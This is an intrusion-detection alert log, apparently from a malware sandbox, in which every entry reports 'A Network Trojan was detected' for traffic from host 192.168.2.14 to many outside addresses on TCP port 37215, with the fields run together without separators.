                  2024-09-21T15:21:49.210102+020028352221A Network Trojan was detected192.168.2.143488641.51.101.3837215TCP
                  2024-09-21T15:21:49.210129+020028352221A Network Trojan was detected192.168.2.145318083.48.210.8337215TCP
                  2024-09-21T15:21:49.210390+020028352221A Network Trojan was detected192.168.2.1446980157.169.139.14437215TCP
                  2024-09-21T15:21:49.211039+020028352221A Network Trojan was detected192.168.2.145338441.244.206.19837215TCP
                  2024-09-21T15:21:49.265950+020028352221A Network Trojan was detected192.168.2.1445042169.21.123.11437215TCP
                  2024-09-21T15:21:51.428079+020028352221A Network Trojan was detected192.168.2.1443444157.151.154.4737215TCP
                  2024-09-21T15:21:51.500205+020028352221A Network Trojan was detected192.168.2.1453510197.51.217.737215TCP
                  2024-09-21T15:21:51.610482+020028352221A Network Trojan was detected192.168.2.144482641.35.124.9937215TCP
                  2024-09-21T15:21:51.754291+020028352221A Network Trojan was detected192.168.2.145386041.150.10.3237215TCP
                  2024-09-21T15:21:51.863569+020028352221A Network Trojan was detected192.168.2.145737035.52.35.2137215TCP
                  2024-09-21T15:21:51.969254+020028352221A Network Trojan was detected192.168.2.145421857.130.198.20337215TCP
                  2024-09-21T15:21:52.109714+020028352221A Network Trojan was detected192.168.2.1444300157.95.120.19837215TCP
                  2024-09-21T15:21:52.141631+020028352221A Network Trojan was detected192.168.2.1458788157.197.175.15937215TCP
                  2024-09-21T15:21:52.156543+020028352221A Network Trojan was detected192.168.2.1446858157.57.98.25337215TCP
                  2024-09-21T15:21:52.158291+020028352221A Network Trojan was detected192.168.2.1433008149.176.166.25337215TCP
                  2024-09-21T15:21:52.158360+020028352221A Network Trojan was detected192.168.2.1442884157.28.233.6337215TCP
                  2024-09-21T15:21:52.158616+020028352221A Network Trojan was detected192.168.2.1441096197.219.199.20737215TCP
                  2024-09-21T15:21:52.162228+020028352221A Network Trojan was detected192.168.2.1456164197.72.231.4837215TCP
                  2024-09-21T15:21:52.172169+020028352221A Network Trojan was detected192.168.2.1433696157.29.40.10437215TCP
                  2024-09-21T15:21:52.203685+020028352221A Network Trojan was detected192.168.2.1455876216.165.155.16237215TCP
                  2024-09-21T15:21:52.238584+020028352221A Network Trojan was detected192.168.2.1456164197.6.151.337215TCP
                  2024-09-21T15:21:52.238598+020028352221A Network Trojan was detected192.168.2.144345841.239.186.16737215TCP
                  2024-09-21T15:21:52.238605+020028352221A Network Trojan was detected192.168.2.1442490157.71.95.2637215TCP
                  2024-09-21T15:21:52.238622+020028352221A Network Trojan was detected192.168.2.145141441.11.4.23737215TCP
                  2024-09-21T15:21:52.238626+020028352221A Network Trojan was detected192.168.2.1448278197.85.143.10037215TCP
                  2024-09-21T15:21:52.238641+020028352221A Network Trojan was detected192.168.2.144002641.125.193.13537215TCP
                  2024-09-21T15:21:52.238668+020028352221A Network Trojan was detected192.168.2.1459590126.119.237.16737215TCP
                  2024-09-21T15:21:52.238669+020028352221A Network Trojan was detected192.168.2.1441042157.192.207.16637215TCP
                  2024-09-21T15:21:52.238682+020028352221A Network Trojan was detected192.168.2.1434758197.165.151.16337215TCP
                  2024-09-21T15:21:52.238695+020028352221A Network Trojan was detected192.168.2.1443744197.234.152.3637215TCP
                  2024-09-21T15:21:52.238709+020028352221A Network Trojan was detected192.168.2.1460412197.85.24.9237215TCP
                  2024-09-21T15:21:52.238713+020028352221A Network Trojan was detected192.168.2.1452860157.38.59.2837215TCP
                  2024-09-21T15:21:52.238723+020028352221A Network Trojan was detected192.168.2.146025041.21.84.19437215TCP
                  2024-09-21T15:21:52.238741+020028352221A Network Trojan was detected192.168.2.1438644197.59.7.24837215TCP
                  2024-09-21T15:21:52.238756+020028352221A Network Trojan was detected192.168.2.1447194197.67.126.5137215TCP
                  2024-09-21T15:21:52.238779+020028352221A Network Trojan was detected192.168.2.1456436157.70.43.15437215TCP
                  2024-09-21T15:21:52.238811+020028352221A Network Trojan was detected192.168.2.1440344197.210.125.12437215TCP
                  2024-09-21T15:21:53.187541+020028352221A Network Trojan was detected192.168.2.1437568157.120.97.15937215TCP
                  2024-09-21T15:21:53.187674+020028352221A Network Trojan was detected192.168.2.145663441.177.119.2637215TCP
                  2024-09-21T15:21:53.192326+020028352221A Network Trojan was detected192.168.2.1438338203.58.253.11237215TCP
                  2024-09-21T15:21:53.192335+020028352221A Network Trojan was detected192.168.2.1447444157.102.117.18137215TCP
                  2024-09-21T15:21:53.192494+020028352221A Network Trojan was detected192.168.2.1444544193.15.54.9137215TCP
                  2024-09-21T15:21:53.192530+020028352221A Network Trojan was detected192.168.2.143380641.7.205.25137215TCP
                  2024-09-21T15:21:53.207331+020028352221A Network Trojan was detected192.168.2.144944884.95.117.1437215TCP
                  2024-09-21T15:21:53.207357+020028352221A Network Trojan was detected192.168.2.144579068.90.34.23637215TCP
                  2024-09-21T15:21:53.207370+020028352221A Network Trojan was detected192.168.2.1437764157.165.9.24737215TCP
                  2024-09-21T15:21:53.207457+020028352221A Network Trojan was detected192.168.2.144779441.44.143.17337215TCP
                  2024-09-21T15:21:53.207461+020028352221A Network Trojan was detected192.168.2.1459044197.99.100.24837215TCP
                  2024-09-21T15:21:53.211627+020028352221A Network Trojan was detected192.168.2.1458294157.151.128.5737215TCP
                  2024-09-21T15:21:53.211759+020028352221A Network Trojan was detected192.168.2.1432950167.176.156.25237215TCP
                  2024-09-21T15:21:53.211836+020028352221A Network Trojan was detected192.168.2.1451450197.235.88.9237215TCP
                  2024-09-21T15:21:53.212006+020028352221A Network Trojan was detected192.168.2.1451612157.2.161.16637215TCP
                  2024-09-21T15:21:53.212006+020028352221A Network Trojan was detected192.168.2.1456120197.16.232.1037215TCP
                  2024-09-21T15:21:53.212032+020028352221A Network Trojan was detected192.168.2.14477721.198.157.7737215TCP
                  2024-09-21T15:21:53.224109+020028352221A Network Trojan was detected192.168.2.1459376197.227.57.25137215TCP
                  2024-09-21T15:21:53.224124+020028352221A Network Trojan was detected192.168.2.1457036157.242.86.17237215TCP
                  2024-09-21T15:21:53.224158+020028352221A Network Trojan was detected192.168.2.1457026157.120.235.15837215TCP
                  2024-09-21T15:21:53.224223+020028352221A Network Trojan was detected192.168.2.143786632.173.158.11037215TCP
                  2024-09-21T15:21:53.224243+020028352221A Network Trojan was detected192.168.2.1441010176.49.164.7337215TCP
                  2024-09-21T15:21:53.224252+020028352221A Network Trojan was detected192.168.2.1444804157.19.55.5737215TCP
                  2024-09-21T15:21:53.224264+020028352221A Network Trojan was detected192.168.2.143729441.177.16.6037215TCP
                  2024-09-21T15:21:53.224267+020028352221A Network Trojan was detected192.168.2.144414441.63.187.9937215TCP
                  2024-09-21T15:21:53.224282+020028352221A Network Trojan was detected192.168.2.1442128197.111.236.10237215TCP
                  2024-09-21T15:21:53.224296+020028352221A Network Trojan was detected192.168.2.1441908157.76.123.22837215TCP
                  2024-09-21T15:21:53.224296+020028352221A Network Trojan was detected192.168.2.145801041.215.16.20537215TCP
                  2024-09-21T15:21:53.224299+020028352221A Network Trojan was detected192.168.2.1452020197.85.77.19737215TCP
                  2024-09-21T15:21:53.224331+020028352221A Network Trojan was detected192.168.2.1452018157.158.136.637215TCP
                  2024-09-21T15:21:53.224331+020028352221A Network Trojan was detected192.168.2.145162041.191.70.16437215TCP
                  2024-09-21T15:21:53.224339+020028352221A Network Trojan was detected192.168.2.1448382197.223.152.23137215TCP
                  2024-09-21T15:21:53.224339+020028352221A Network Trojan was detected192.168.2.1442886157.46.92.9637215TCP
                  2024-09-21T15:21:53.224350+020028352221A Network Trojan was detected192.168.2.1452528197.106.102.5037215TCP
                  2024-09-21T15:21:53.224365+020028352221A Network Trojan was detected192.168.2.1452538155.26.148.20437215TCP
                  2024-09-21T15:21:53.224386+020028352221A Network Trojan was detected192.168.2.145250641.84.75.16437215TCP
                  2024-09-21T15:21:53.234671+020028352221A Network Trojan was detected192.168.2.1452074197.224.139.13537215TCP
                  2024-09-21T15:21:53.234700+020028352221A Network Trojan was detected192.168.2.1439236197.4.225.5137215TCP
                  2024-09-21T15:21:53.234715+020028352221A Network Trojan was detected192.168.2.1433746197.127.48.17537215TCP
                  2024-09-21T15:21:53.234718+020028352221A Network Trojan was detected192.168.2.1451814157.136.98.17237215TCP
                  2024-09-21T15:21:53.234727+020028352221A Network Trojan was detected192.168.2.1436946197.24.187.12137215TCP
                  2024-09-21T15:21:53.234747+020028352221A Network Trojan was detected192.168.2.1454300157.5.214.23137215TCP
                  2024-09-21T15:21:53.234755+020028352221A Network Trojan was detected192.168.2.145366641.37.126.10337215TCP
                  2024-09-21T15:21:53.234759+020028352221A Network Trojan was detected192.168.2.144238041.217.41.7637215TCP
                  2024-09-21T15:21:53.234782+020028352221A Network Trojan was detected192.168.2.1460514197.234.147.18637215TCP
                  2024-09-21T15:21:53.234792+020028352221A Network Trojan was detected192.168.2.144503841.10.54.24437215TCP
                  2024-09-21T15:21:53.234796+020028352221A Network Trojan was detected192.168.2.1442218197.171.92.22837215TCP
                  2024-09-21T15:21:53.234802+020028352221A Network Trojan was detected192.168.2.1452902129.163.45.24237215TCP
                  2024-09-21T15:21:53.234803+020028352221A Network Trojan was detected192.168.2.1441164157.72.20.12737215TCP
                  2024-09-21T15:21:53.234803+020028352221A Network Trojan was detected192.168.2.1435204197.132.201.12937215TCP
                  2024-09-21T15:21:53.234812+020028352221A Network Trojan was detected192.168.2.1443920185.112.183.4837215TCP
                  2024-09-21T15:21:53.234820+020028352221A Network Trojan was detected192.168.2.145356441.252.31.20337215TCP
                  2024-09-21T15:21:53.234837+020028352221A Network Trojan was detected192.168.2.1439620197.218.110.3537215TCP
                  2024-09-21T15:21:53.234842+020028352221A Network Trojan was detected192.168.2.1457618197.163.228.537215TCP
                  2024-09-21T15:21:53.234853+020028352221A Network Trojan was detected192.168.2.1458042157.30.104.19937215TCP
                  2024-09-21T15:21:53.234878+020028352221A Network Trojan was detected192.168.2.143527241.1.226.5137215TCP
                  2024-09-21T15:21:53.234878+020028352221A Network Trojan was detected192.168.2.143335699.138.26.19437215TCP
                  2024-09-21T15:21:53.234878+020028352221A Network Trojan was detected192.168.2.143280441.157.172.7837215TCP
                  2024-09-21T15:21:53.234887+020028352221A Network Trojan was detected192.168.2.143594441.18.248.13937215TCP
                  2024-09-21T15:21:53.234892+020028352221A Network Trojan was detected192.168.2.1460174197.96.174.1837215TCP
                  2024-09-21T15:21:53.234898+020028352221A Network Trojan was detected192.168.2.1452326157.114.217.4337215TCP
                  2024-09-21T15:21:53.234908+020028352221A Network Trojan was detected192.168.2.1453784157.90.115.19437215TCP
                  2024-09-21T15:21:53.234917+020028352221A Network Trojan was detected192.168.2.1449080157.42.189.20737215TCP
                  2024-09-21T15:21:53.250357+020028352221A Network Trojan was detected192.168.2.1440608197.122.182.15237215TCP
                  2024-09-21T15:21:53.275442+020028352221A Network Trojan was detected192.168.2.145126661.72.254.15837215TCP
                  2024-09-21T15:21:53.792246+020028352221A Network Trojan was detected192.168.2.1437940197.4.203.8237215TCP
                  2024-09-21T15:21:54.053373+020028352221A Network Trojan was detected192.168.2.1459874157.82.249.6337215TCP
                  2024-09-21T15:21:55.317133+020028352221A Network Trojan was detected192.168.2.1443484157.98.235.21837215TCP
                  2024-09-21T15:21:55.345773+020028352221A Network Trojan was detected192.168.2.1445426149.224.127.8737215TCP
                  2024-09-21T15:21:55.444746+020028352221A Network Trojan was detected192.168.2.1453708157.168.122.13937215TCP
                  2024-09-21T15:21:56.448111+020028352221A Network Trojan was detected192.168.2.1439032110.185.101.14937215TCP
                  2024-09-21T15:21:57.455266+020028352221A Network Trojan was detected192.168.2.1456158197.173.47.18037215TCP
                  2024-09-21T15:21:57.691085+020028352221A Network Trojan was detected192.168.2.145136441.207.223.9637215TCP
                  2024-09-21T15:21:57.691093+020028352221A Network Trojan was detected192.168.2.1446644157.50.60.22437215TCP
                  2024-09-21T15:21:57.691093+020028352221A Network Trojan was detected192.168.2.1460790157.207.236.10837215TCP
                  2024-09-21T15:21:57.691471+020028352221A Network Trojan was detected192.168.2.145787641.74.102.9237215TCP
                  2024-09-21T15:21:57.785711+020028352221A Network Trojan was detected192.168.2.146033841.11.150.12637215TCP
                  2024-09-21T15:21:57.878793+020028352221A Network Trojan was detected192.168.2.1443126197.166.117.6737215TCP
                  2024-09-21T15:21:57.988883+020028352221A Network Trojan was detected192.168.2.1446864157.216.186.5037215TCP
                  2024-09-21T15:21:58.082776+020028352221A Network Trojan was detected192.168.2.1449472157.36.152.3637215TCP
                  2024-09-21T15:21:58.113639+020028352221A Network Trojan was detected192.168.2.1460966197.40.180.1737215TCP
                  2024-09-21T15:21:58.156564+020028352221A Network Trojan was detected192.168.2.145429841.85.242.23037215TCP
                  2024-09-21T15:21:58.158021+020028352221A Network Trojan was detected192.168.2.144507418.73.52.4937215TCP
                  2024-09-21T15:21:58.158023+020028352221A Network Trojan was detected192.168.2.1447578129.82.37.11437215TCP
                  2024-09-21T15:21:58.158295+020028352221A Network Trojan was detected192.168.2.1437096157.168.194.17037215TCP
                  2024-09-21T15:21:58.172271+020028352221A Network Trojan was detected192.168.2.1435052197.174.77.837215TCP
                  2024-09-21T15:21:58.172738+020028352221A Network Trojan was detected192.168.2.1438076157.115.245.5937215TCP
                  2024-09-21T15:21:58.172794+020028352221A Network Trojan was detected192.168.2.1444830157.218.226.8937215TCP
                  2024-09-21T15:21:58.173198+020028352221A Network Trojan was detected192.168.2.1444096187.103.239.2437215TCP
                  2024-09-21T15:21:58.173203+020028352221A Network Trojan was detected192.168.2.1454928157.174.58.9637215TCP
                  2024-09-21T15:21:58.176335+020028352221A Network Trojan was detected192.168.2.1443526197.44.142.5837215TCP
                  2024-09-21T15:21:58.177826+020028352221A Network Trojan was detected192.168.2.1439118197.230.213.14237215TCP
                  2024-09-21T15:21:58.178127+020028352221A Network Trojan was detected192.168.2.1458144157.122.241.22937215TCP
                  2024-09-21T15:21:58.224841+020028352221A Network Trojan was detected192.168.2.1449530157.154.145.3837215TCP
                  2024-09-21T15:21:58.336205+020028352221A Network Trojan was detected192.168.2.144961441.15.225.18337215TCP
                  2024-09-21T15:21:58.336207+020028352221A Network Trojan was detected192.168.2.1449580157.215.223.21237215TCP
                  2024-09-21T15:21:58.336220+020028352221A Network Trojan was detected192.168.2.1438364157.250.251.16337215TCP
                  2024-09-21T15:21:58.336230+020028352221A Network Trojan was detected192.168.2.1441228157.67.198.14037215TCP
                  2024-09-21T15:21:58.336237+020028352221A Network Trojan was detected192.168.2.1437482197.239.62.10137215TCP
                  2024-09-21T15:21:58.336249+020028352221A Network Trojan was detected192.168.2.145019041.133.236.1537215TCP
                  2024-09-21T15:21:58.336269+020028352221A Network Trojan was detected192.168.2.145689078.90.24.15637215TCP
                  2024-09-21T15:21:58.336271+020028352221A Network Trojan was detected192.168.2.143761841.174.219.11437215TCP
                  2024-09-21T15:21:58.336271+020028352221A Network Trojan was detected192.168.2.145164641.219.139.5037215TCP
                  2024-09-21T15:21:58.336292+020028352221A Network Trojan was detected192.168.2.1456956157.220.41.2037215TCP
                  2024-09-21T15:21:58.336299+020028352221A Network Trojan was detected192.168.2.143541041.99.31.9537215TCP
                  2024-09-21T15:21:58.336320+020028352221A Network Trojan was detected192.168.2.1445722157.59.48.8037215TCP
                  2024-09-21T15:21:58.336321+020028352221A Network Trojan was detected192.168.2.1447560197.134.226.10337215TCP
                  2024-09-21T15:21:58.336325+020028352221A Network Trojan was detected192.168.2.1449862157.16.220.17837215TCP
                  2024-09-21T15:21:58.336325+020028352221A Network Trojan was detected192.168.2.1460478129.88.214.22137215TCP
                  2024-09-21T15:21:58.336325+020028352221A Network Trojan was detected192.168.2.143581641.31.228.6437215TCP
                  2024-09-21T15:21:58.336330+020028352221A Network Trojan was detected192.168.2.145390293.163.182.25437215TCP
                  2024-09-21T15:21:58.336349+020028352221A Network Trojan was detected192.168.2.1440924157.237.51.23237215TCP
                  2024-09-21T15:21:58.336362+020028352221A Network Trojan was detected192.168.2.1447034157.166.139.9037215TCP
                  2024-09-21T15:21:58.336368+020028352221A Network Trojan was detected192.168.2.144362441.48.25.8237215TCP
                  2024-09-21T15:21:58.336369+020028352221A Network Trojan was detected192.168.2.145136841.108.166.15737215TCP
                  2024-09-21T15:21:58.336369+020028352221A Network Trojan was detected192.168.2.1433576170.15.79.9237215TCP
                  2024-09-21T15:21:58.336381+020028352221A Network Trojan was detected192.168.2.1439686197.82.187.8537215TCP
                  2024-09-21T15:21:58.336384+020028352221A Network Trojan was detected192.168.2.144603041.2.77.19837215TCP
                  2024-09-21T15:21:58.336397+020028352221A Network Trojan was detected192.168.2.1440090197.84.113.18437215TCP
                  2024-09-21T15:21:58.336409+020028352221A Network Trojan was detected192.168.2.1435468197.218.69.23437215TCP
                  2024-09-21T15:21:58.336411+020028352221A Network Trojan was detected192.168.2.144020841.243.92.5937215TCP
                  2024-09-21T15:21:58.336413+020028352221A Network Trojan was detected192.168.2.1449552207.149.6.6237215TCP
                  2024-09-21T15:21:58.336427+020028352221A Network Trojan was detected192.168.2.1438654157.48.168.1437215TCP
                  2024-09-21T15:21:58.336444+020028352221A Network Trojan was detected192.168.2.1436400112.200.49.4737215TCP
                  2024-09-21T15:21:58.336447+020028352221A Network Trojan was detected192.168.2.145769241.83.200.19637215TCP
                  2024-09-21T15:21:58.336450+020028352221A Network Trojan was detected192.168.2.1436886149.32.201.24137215TCP
                  2024-09-21T15:21:59.117393+020028352221A Network Trojan was detected192.168.2.144370841.82.111.9337215TCP
                  2024-09-21T15:21:59.172518+020028352221A Network Trojan was detected192.168.2.1456520197.46.9.11037215TCP
                  2024-09-21T15:21:59.172518+020028352221A Network Trojan was detected192.168.2.143574685.151.209.15637215TCP
                  2024-09-21T15:21:59.172624+020028352221A Network Trojan was detected192.168.2.1436108157.117.186.6137215TCP
                  2024-09-21T15:21:59.173960+020028352221A Network Trojan was detected192.168.2.1434898197.216.248.12237215TCP
                  2024-09-21T15:21:59.188569+020028352221A Network Trojan was detected192.168.2.1447326157.115.156.16837215TCP
                  2024-09-21T15:21:59.204001+020028352221A Network Trojan was detected192.168.2.1450924197.23.127.2937215TCP
                  2024-09-21T15:21:59.207631+020028352221A Network Trojan was detected192.168.2.145742641.197.217.5037215TCP
                  2024-09-21T15:21:59.219335+020028352221A Network Trojan was detected192.168.2.1439518157.194.119.3637215TCP
                  2024-09-21T15:21:59.359826+020028352221A Network Trojan was detected192.168.2.1433970197.13.74.17837215TCP
                  2024-09-21T15:21:59.422380+020028352221A Network Trojan was detected192.168.2.1449996197.84.171.1237215TCP
                  2024-09-21T15:21:59.487679+020028352221A Network Trojan was detected192.168.2.1445446157.227.185.11437215TCP
                  2024-09-21T15:21:59.723511+020028352221A Network Trojan was detected192.168.2.1437772197.50.114.19837215TCP
                  2024-09-21T15:21:59.765701+020028352221A Network Trojan was detected192.168.2.145948841.31.153.9137215TCP
                  2024-09-21T15:21:59.898560+020028352221A Network Trojan was detected192.168.2.1445032197.222.229.18737215TCP
                  2024-09-21T15:21:59.972423+020028352221A Network Trojan was detected192.168.2.1458636151.226.71.137215TCP
                  2024-09-21T15:22:00.097091+020028352221A Network Trojan was detected192.168.2.1439886197.81.248.25237215TCP
                  2024-09-21T15:22:00.170505+020028352221A Network Trojan was detected192.168.2.1446708157.60.220.16237215TCP
                  2024-09-21T15:22:00.175642+020028352221A Network Trojan was detected192.168.2.1457402211.18.47.10837215TCP
                  2024-09-21T15:22:00.175649+020028352221A Network Trojan was detected192.168.2.143909841.36.71.13137215TCP
                  2024-09-21T15:22:00.176792+020028352221A Network Trojan was detected192.168.2.1440186197.128.216.10837215TCP
                  2024-09-21T15:22:00.176809+020028352221A Network Trojan was detected192.168.2.1436788197.122.135.6937215TCP
                  2024-09-21T15:22:00.176815+020028352221A Network Trojan was detected192.168.2.1448748197.103.20.16037215TCP
                  2024-09-21T15:22:00.176834+020028352221A Network Trojan was detected192.168.2.1437866197.173.0.21037215TCP
                  2024-09-21T15:22:00.176841+020028352221A Network Trojan was detected192.168.2.144897253.95.190.19837215TCP
                  2024-09-21T15:22:00.176854+020028352221A Network Trojan was detected192.168.2.1451122197.225.123.15137215TCP
                  2024-09-21T15:22:00.176860+020028352221A Network Trojan was detected192.168.2.1440966197.190.76.22037215TCP
                  2024-09-21T15:22:00.176861+020028352221A Network Trojan was detected192.168.2.145380841.15.255.9937215TCP
                  2024-09-21T15:22:00.177912+020028352221A Network Trojan was detected192.168.2.1446032197.247.26.22737215TCP
                  2024-09-21T15:22:00.177942+020028352221A Network Trojan was detected192.168.2.1443658197.248.52.20437215TCP
                  2024-09-21T15:22:00.177959+020028352221A Network Trojan was detected192.168.2.145724041.12.124.16237215TCP
                  2024-09-21T15:22:00.177966+020028352221A Network Trojan was detected192.168.2.145821041.116.145.12937215TCP
                  2024-09-21T15:22:00.177989+020028352221A Network Trojan was detected192.168.2.146017245.246.68.19137215TCP
                  2024-09-21T15:22:00.177996+020028352221A Network Trojan was detected192.168.2.1451410197.165.136.3437215TCP
                  2024-09-21T15:22:00.178340+020028352221A Network Trojan was detected192.168.2.1439036157.67.68.23337215TCP
                  2024-09-21T15:22:00.178350+020028352221A Network Trojan was detected192.168.2.1440562157.242.114.10037215TCP
                  2024-09-21T15:22:00.179403+020028352221A Network Trojan was detected192.168.2.145833641.154.75.10437215TCP
                  2024-09-21T15:22:00.179403+020028352221A Network Trojan was detected192.168.2.1441196150.82.161.637215TCP
                  2024-09-21T15:22:00.179421+020028352221A Network Trojan was detected192.168.2.1460550157.33.55.19037215TCP
                  2024-09-21T15:22:00.179460+020028352221A Network Trojan was detected192.168.2.1434656197.221.243.25237215TCP
                  2024-09-21T15:22:00.179490+020028352221A Network Trojan was detected192.168.2.144168467.211.216.19237215TCP
                  2024-09-21T15:22:00.183518+020028352221A Network Trojan was detected192.168.2.1433968157.53.198.2137215TCP
                  2024-09-21T15:22:00.185576+020028352221A Network Trojan was detected192.168.2.1442070157.16.10.13737215TCP
                  2024-09-21T15:22:00.189828+020028352221A Network Trojan was detected192.168.2.1453772197.125.57.8637215TCP
                  2024-09-21T15:22:00.189828+020028352221A Network Trojan was detected192.168.2.146038241.146.114.19137215TCP
                  2024-09-21T15:22:00.189856+020028352221A Network Trojan was detected192.168.2.1454026157.222.186.15437215TCP
                  2024-09-21T15:22:00.199698+020028352221A Network Trojan was detected192.168.2.144625041.166.142.24737215TCP
                  2024-09-21T15:22:00.199709+020028352221A Network Trojan was detected192.168.2.1454048197.196.81.1437215TCP
                  2024-09-21T15:22:00.199723+020028352221A Network Trojan was detected192.168.2.1434612157.167.32.18337215TCP
                  2024-09-21T15:22:00.216391+020028352221A Network Trojan was detected192.168.2.1446552157.57.163.19537215TCP
                  2024-09-21T15:22:00.216500+020028352221A Network Trojan was detected192.168.2.145684297.232.242.12637215TCP
                  2024-09-21T15:22:00.216515+020028352221A Network Trojan was detected192.168.2.1457990120.167.142.13437215TCP
                  2024-09-21T15:22:00.217936+020028352221A Network Trojan was detected192.168.2.1444398158.156.206.1137215TCP
                  2024-09-21T15:22:00.217946+020028352221A Network Trojan was detected192.168.2.145112448.57.103.5337215TCP
                  2024-09-21T15:22:00.217946+020028352221A Network Trojan was detected192.168.2.145343041.219.66.17237215TCP
                  2024-09-21T15:22:00.217960+020028352221A Network Trojan was detected192.168.2.1447726157.107.103.9237215TCP
                  2024-09-21T15:22:00.218100+020028352221A Network Trojan was detected192.168.2.14461628.60.165.16737215TCP
                  2024-09-21T15:22:00.223153+020028352221A Network Trojan was detected192.168.2.14575568.76.81.7337215TCP
                  2024-09-21T15:22:00.223159+020028352221A Network Trojan was detected192.168.2.1445944197.175.111.3237215TCP
                  2024-09-21T15:22:00.223175+020028352221A Network Trojan was detected192.168.2.1439386182.142.149.12437215TCP
                  2024-09-21T15:22:00.223181+020028352221A Network Trojan was detected192.168.2.1440806197.157.13.20437215TCP
                  2024-09-21T15:22:00.223188+020028352221A Network Trojan was detected192.168.2.1440146157.237.53.24437215TCP
                  2024-09-21T15:22:00.223222+020028352221A Network Trojan was detected192.168.2.1455178210.136.113.20937215TCP
                  2024-09-21T15:22:00.223242+020028352221A Network Trojan was detected192.168.2.1458888197.71.80.1837215TCP
                  2024-09-21T15:22:00.223243+020028352221A Network Trojan was detected192.168.2.1450418157.86.46.8737215TCP
                  2024-09-21T15:22:00.223259+020028352221A Network Trojan was detected192.168.2.1451246197.11.92.23837215TCP
                  2024-09-21T15:22:00.223261+020028352221A Network Trojan was detected192.168.2.1457764206.202.95.23137215TCP
                  2024-09-21T15:22:00.223282+020028352221A Network Trojan was detected192.168.2.1455748197.153.103.12837215TCP
                  2024-09-21T15:22:00.223302+020028352221A Network Trojan was detected192.168.2.1442942197.97.204.10237215TCP
                  2024-09-21T15:22:00.223305+020028352221A Network Trojan was detected192.168.2.1440674197.114.223.8537215TCP
                  2024-09-21T15:22:00.224581+020028352221A Network Trojan was detected192.168.2.144133278.186.142.037215TCP
                  2024-09-21T15:22:00.224591+020028352221A Network Trojan was detected192.168.2.1436736197.10.203.837215TCP
                  2024-09-21T15:22:00.224602+020028352221A Network Trojan was detected192.168.2.1456164157.254.159.22937215TCP
                  2024-09-21T15:22:00.224608+020028352221A Network Trojan was detected192.168.2.1458208197.82.92.16537215TCP
                  2024-09-21T15:22:00.224625+020028352221A Network Trojan was detected192.168.2.143542641.177.128.8837215TCP
                  2024-09-21T15:22:00.224639+020028352221A Network Trojan was detected192.168.2.1458682197.126.22.11637215TCP
                  2024-09-21T15:22:00.225165+020028352221A Network Trojan was detected192.168.2.144645241.25.136.20737215TCP
                  2024-09-21T15:22:00.232668+020028352221A Network Trojan was detected192.168.2.1460780157.96.160.8837215TCP
                  2024-09-21T15:22:00.232694+020028352221A Network Trojan was detected192.168.2.1436060169.86.63.11937215TCP
                  2024-09-21T15:22:00.232699+020028352221A Network Trojan was detected192.168.2.143380441.230.109.6937215TCP
                  2024-09-21T15:22:00.232720+020028352221A Network Trojan was detected192.168.2.1436982158.29.213.9137215TCP
                  2024-09-21T15:22:00.251060+020028352221A Network Trojan was detected192.168.2.1455152157.78.89.21937215TCP
                  2024-09-21T15:22:00.251065+020028352221A Network Trojan was detected192.168.2.1458490197.99.46.24537215TCP
                  2024-09-21T15:22:00.394260+020028352221A Network Trojan was detected192.168.2.1435910197.157.245.23437215TCP
                  2024-09-21T15:22:00.394279+020028352221A Network Trojan was detected192.168.2.1456018197.58.198.23937215TCP
                  2024-09-21T15:22:00.394500+020028352221A Network Trojan was detected192.168.2.1456766157.108.17.11337215TCP
                  2024-09-21T15:22:01.239666+020028352221A Network Trojan was detected192.168.2.1456308157.77.106.18337215TCP
                  2024-09-21T15:22:01.251322+020028352221A Network Trojan was detected192.168.2.1449032157.63.212.16937215TCP
                  2024-09-21T15:22:01.254768+020028352221A Network Trojan was detected192.168.2.1450966157.231.225.24037215TCP
                  2024-09-21T15:22:01.283907+020028352221A Network Trojan was detected192.168.2.1442674197.106.212.14837215TCP
                  2024-09-21T15:22:02.294845+020028352221A Network Trojan was detected192.168.2.1451066197.237.107.21037215TCP
                  2024-09-21T15:22:02.296807+020028352221A Network Trojan was detected192.168.2.1439300157.58.177.21337215TCP
                  2024-09-21T15:22:02.306363+020028352221A Network Trojan was detected192.168.2.1453254110.173.1.24237215TCP
                  2024-09-21T15:22:02.306629+020028352221A Network Trojan was detected192.168.2.1455744103.197.232.11837215TCP
                  2024-09-21T15:22:02.306641+020028352221A Network Trojan was detected192.168.2.1439710197.162.30.10037215TCP
                  2024-09-21T15:22:02.307462+020028352221A Network Trojan was detected192.168.2.1446226157.4.102.537215TCP
                  2024-09-21T15:22:02.307476+020028352221A Network Trojan was detected192.168.2.1439100157.205.203.16337215TCP
                  2024-09-21T15:22:02.307503+020028352221A Network Trojan was detected192.168.2.1437652197.57.223.15437215TCP
                  2024-09-21T15:22:02.307760+020028352221A Network Trojan was detected192.168.2.143670241.179.61.12737215TCP
                  2024-09-21T15:22:02.309328+020028352221A Network Trojan was detected192.168.2.1434646157.110.57.21737215TCP
                  2024-09-21T15:22:02.309715+020028352221A Network Trojan was detected192.168.2.1458446157.146.15.11037215TCP
                  2024-09-21T15:22:02.309742+020028352221A Network Trojan was detected192.168.2.1446818134.71.224.20937215TCP
                  2024-09-21T15:22:02.310497+020028352221A Network Trojan was detected192.168.2.1459286157.137.235.13337215TCP
                  2024-09-21T15:22:02.315278+020028352221A Network Trojan was detected192.168.2.145542696.136.5.17337215TCP
                  2024-09-21T15:22:02.321827+020028352221A Network Trojan was detected192.168.2.145909041.99.171.25037215TCP
                  2024-09-21T15:22:02.323484+020028352221A Network Trojan was detected192.168.2.143827841.4.128.20837215TCP
                  2024-09-21T15:22:02.323602+020028352221A Network Trojan was detected192.168.2.1449220197.81.58.17237215TCP
                  2024-09-21T15:22:02.325353+020028352221A Network Trojan was detected192.168.2.1448240213.71.142.5337215TCP
                  2024-09-21T15:22:02.325620+020028352221A Network Trojan was detected192.168.2.1447284157.192.135.12537215TCP
                  2024-09-21T15:22:02.326149+020028352221A Network Trojan was detected192.168.2.1433298157.247.76.10537215TCP
                  2024-09-21T15:22:02.327935+020028352221A Network Trojan was detected192.168.2.1452134134.115.125.22737215TCP
                  2024-09-21T15:22:02.328526+020028352221A Network Trojan was detected192.168.2.1440804197.174.116.6837215TCP
                  2024-09-21T15:22:02.338786+020028352221A Network Trojan was detected192.168.2.1448022157.161.71.25537215TCP
                  2024-09-21T15:22:03.290252+020028352221A Network Trojan was detected192.168.2.1454818197.140.43.19937215TCP
                  2024-09-21T15:22:03.290478+020028352221A Network Trojan was detected192.168.2.1434612157.151.109.23637215TCP
                  2024-09-21T15:22:03.293589+020028352221A Network Trojan was detected192.168.2.1433234157.35.110.7437215TCP
